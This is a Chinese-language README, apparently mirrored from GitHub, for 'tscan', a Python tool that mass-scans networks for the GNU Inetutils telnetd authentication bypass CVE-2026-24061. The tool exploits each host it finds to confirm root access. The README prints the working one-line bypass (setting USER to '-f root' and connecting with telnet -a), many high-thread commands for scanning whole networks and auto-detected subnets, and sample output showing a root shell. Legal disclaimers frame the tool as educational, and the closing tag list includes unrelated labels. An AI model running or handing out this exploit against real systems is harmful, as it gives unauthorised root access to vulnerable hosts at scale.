cumakurt/tscan
GitHub: cumakurt/tscan
针对 GNU Inetutils telnetd CVE-2026-24061 认证绕过漏洞的 Python 扫描器,可批量检测存在漏洞的服务并验证 root 权限获取能力。
Stars: 0 | Forks: 0
# Telnetd Auth Bypass 扫描器 (CVE-2026-24061)
一个基于 Python 的扫描器,用于检测和利用 GNU Inetutils telnetd 服务中的 CVE-2026-24061 漏洞。该工具扫描 IP 地址或网络,查找存在漏洞的 telnetd 服务,这些服务允许绕过认证从而获取 root shell 访问权限。
## ⚠️ 重要法律声明和免责声明
**本软件仅供教育和授权安全测试目的使用。**
### 1. 教育目的
本应用程序**仅出于教育目的**而开发,旨在演示安全漏洞并协助进行授权的安全测试和研究。
### 2. 无担保
**本软件“按原样”提供,不提供任何形式的明示或暗示担保**,包括但不限于适销性、特定用途适用性和非侵权性的担保。**作者和贡献者不保证本软件无错误、安全或可用。** 本软件可能包含错误、缺陷或其他问题。
### 3. 用户责任
**使用本软件的所有责任和风险完全由用户承担。** 本软件的作者、贡献者和分发者不对因使用、滥用或无法使用本软件而导致的任何损害、损失或法律后果承担责任。
### 4. 禁止未经授权的使用
此工具**只能用于您拥有或获得明确书面授权进行测试的系统。** 未经授权访问计算机系统是非法的,可能导致刑事起诉。
### 5. 不做保证
作者**不**保证:
- 扫描结果的准确性
- 应用程序本身的安全性
- 与所有系统的兼容性
- 无错误或缺陷
- 任何特定功能或性能
**使用本软件即表示您确认已阅读、理解并同意受这些条款约束。如果您不同意,请勿使用本软件。**
## 开发者
**开发者:** Cuma KURT
**Email:** cumakurt@gmail.com
**LinkedIn:** https://www.linkedin.com/in/cuma-kurt-34414917/
## 漏洞信息
**CVE-2026-24061**: GNU Inetutils telnetd(截至 2.7 版本)允许通过为 USER 环境变量设置 `-f root` 值来远程绕过认证。
**CVSS 评分**: 9.8 (严重)
**参考**: [NVD CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
## 功能
- 🔍 **端口扫描**: 检测开放的 telnet 端口(默认: 23,可自定义)
- 🎯 **漏洞检测**: 测试是否存在 CVE-2026-24061 漏洞利用条件
- ⚡ **多线程**: 支持配置线程数的快速并发扫描
- 📁 **灵活输入**: 支持 IP 地址、CIDR 网络和基于文件的目标列表
- 🗺️ **自动检测**: 自动从路由表检测并扫描子网
- 🛑 **安全中断**: Ctrl+C 安全停止扫描并显示部分结果
- 📊 **实时进度**: 带有统计信息和发现结果的进度条
## 安装
### 前置条件
- Python 3.6 或更高版本
- `telnet` 客户端(通常预装在 Linux/macOS 上)
### 安装依赖
```
pip3 install -r requirements.txt
```
**注意**: 大多数依赖项属于 Python 标准库。该工具在 Python 3.6+ 下即可开箱即用。
## 使用
### 基本用法
```
# 扫描单个 IP 地址
python3 tscan.py 192.168.1.1
# 扫描 CIDR 网络
python3 tscan.py 192.168.1.0/24
# 使用自定义端口扫描
python3 tscan.py -p 2323 192.168.1.1
# 从文件扫描目标
python3 tscan.py targets.txt
# 扫描多个 IP 地址
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# 扫描多个 CIDR 网络
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
```
### 性能调优
```
# 增加线程数以加快扫描速度 (100 线程)
python3 tscan.py -t 100 192.168.1.0/24
# 为慢速网络增加超时时间
python3 tscan.py --timeout 10 192.168.1.0/24
# 结合使用以进行大型网络扫描
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
```
### 自动检测模式
```
# 自动检测并扫描系统路由表中的所有子网
python3 tscan.py --auto
# 或使用简写形式:
python3 tscan.py -a
# 使用自定义端口自动检测
python3 tscan.py --auto -p 2323
# 或:
python3 tscan.py -a -p 2323
# 使用高线程数自动检测
python3 tscan.py --auto -t 200
# 或:
python3 tscan.py -a -t 200
```
**注意**: `--auto` 模式使用 `ip route list` 或 `route -n` 命令读取系统路由表,并自动扫描所有检测到的子网。
### 实战示例
```
# 示例 1:快速扫描本地网络
python3 tscan.py 192.168.1.0/24
# 示例 2:高并发快速扫描
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# 示例 3:扫描非标准 telnet 端口
python3 tscan.py -p 2323 192.168.1.0/24
# 示例 4:自动检测并扫描所有本地网络子网
python3 tscan.py --auto
# 或:
python3 tscan.py -a
# 示例 5:使用自定义设置自动检测
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# 或:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
```
### 命令行选项
```
positional arguments:
targets IP address(es), CIDR network(s), or file path(s) containing targets
options:
-h, --help show this help message and exit
-p, --port PORT Telnet port to scan (default: 23)
-t, --threads THREADS Number of concurrent threads (default: 50)
--timeout TIMEOUT Connection timeout in seconds (default: 5)
-v, --verbose Verbose output
-a, --auto Automatically detect and scan all subnets from system routing table (route -n or ip route list)
```
## 输入文件格式
创建一个文本文件,每行一个目标:
```
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
```
以 `#` 开头的行被视为注释并被忽略。
## 输出
该工具提供:
1. **实时进度**: 在发现结果时显示
- 带有百分比和统计信息的进度条
- 进度条中显示易受攻击主机数量
- `[!]` - 易受攻击主机
- `[~]` - 端口开放但不易受攻击
- 端口关闭的目标会被静默跳过
- **Ctrl+C (KeyboardInterrupt)**: 安全中断扫描并立即显示部分结果
2. **摘要报告**: 包括:
- 发现的 telnet 服务总数
- 易受攻击主机数量
- 易受攻击主机的详细列表
### 示例输出
#### 基本扫描输出
```
[*] Starting scan on 256 target(s)...
[*] Port: 23, Threads: 50, Timeout: 5s
[*] Progress: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Open: 2 | Vulnerable: 1
[!] 192.168.1.100:23 - VULNERABLE
[*] Progress: [████████████████████████████████████] 100.0% (256/256) | Open: 3 | Vulnerable: 1
[+] Scan completed: 256/256 targets scanned
======================================================================
Scan Results Summary
======================================================================
Telnet services found: 3
Vulnerable hosts: 1
[!] VULNERABLE HOSTS:
● 192.168.1.100:23
Output: uid=0(root) gid=0(root) groups=0(root)...
[~] Telnet services found but not vulnerable:
● 192.168.1.101:23
● 192.168.1.102:23
[*] Scan completed in 12.34 seconds
```
## 工作原理
1. **端口检测**: 检查目标 IP 上的 telnet 端口是否开放
2. **漏洞利用尝试**: 对于开放端口,尝试 CVE-2026-24061 漏洞利用:
- 设置 `USER="-f root"` 环境变量
- 通过 `telnet -a` 命令连接
- 发送测试命令以验证 root shell 访问权限
3. **结果分类**: 将结果分类为易受攻击或不易受攻击
## 漏洞利用详情
该漏洞允许通过将 `USER` 环境变量设置为 `-f root` 来绕过认证:
```
USER="-f root" telnet -a TARGET_IP [PORT]
```
这导致 telnetd 将 USER 变量解释为一个标志,从而绕过认证并授予 root 访问权限。
## 限制
- 需要安装 `telnet` 客户端
- 仅对存在漏洞的 telnetd 版本(≤ 2.7)有效
- 自动检测模式需要 `ip route list` 或 `route -n` 命令
## 故障排除
### "telnet 命令未找到"
安装 telnet 客户端:
```
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# 通常已预装
```
### 未找到结果
- 验证目标是否可达
- 检查防火墙规则
- 确保 telnet 服务确实在运行
- 尝试增加超时时间: `--timeout 10`
## 法律和道德使用
本工具旨在用于:
- ✅ 授权渗透测试
- ✅ 对您自己系统的安全研究
- ✅ 经适当授权的漏洞评估
- ✅ 受控环境中的教育目的
**请勿将此工具用于:**
- ❌ 未经授权的系统访问
- ❌ 非法黑客活动
- ❌ 任何未经明确许可的活动
## 参考
- [CVE-2026-24061 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
- [SafeBreach Labs 分析](https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/)
## 许可证
本程序是自由软件:您可以根据
自由软件基金会发布的 GNU 通用公共许可证(GPL)条款(第 3 版或
(您选择的)任何更高版本)重新分发和/或修改它。
分发本程序是希望它有用,
但不提供任何担保,
甚至不包括适销性或特定用途适用性的暗示担保。
有关更多详细信息,请参阅 GNU 通用公共许可证。
您应该已经随本程序收到了 GNU 通用公共许可证的副本。
如果没有,请参阅 。
### 完整许可证文本
有关完整的 GNU 通用公共许可证 v3.0 文本,请参阅 [LICENSE](LICENSE) 文件。
## 免责声明
**作者和贡献者不对因使用本工具而造成的任何误用或损害负责。**
本工具**仅供教育和授权安全测试目的使用**。
**使用风险自负。** 使用本软件的所有责任和风险完全由用户承担。作者不保证本软件的准确性、安全性或功能性。本软件“按原样”提供,不提供任何形式的担保。
**本应用程序仅出于教育目的而开发。** 使用本软件即表示您确认:
- 您理解这是一个教育工具
- 使用它的所有责任由您承担
- 作者不提供任何保证或担保
- 您将仅在自己拥有或获得明确书面授权测试的系统上使用它
- 未经授权的使用是非法的,可能导致刑事起诉
如果您不同意这些条款,**请勿使用本软件**。
标签:CVE-2026-24061, GNU Inetutils, PE 加载器, PoC, Python, Root Shell, Telnet, 免杀, 加密, 提权, 攻击路径可视化, 数据统计, 无后门, 暴力破解, 漏洞扫描器, 端口扫描, 编程工具, 网络安全, 认证绕过, 远程代码执行, 逆向工具, 隐私保护, 黑客工具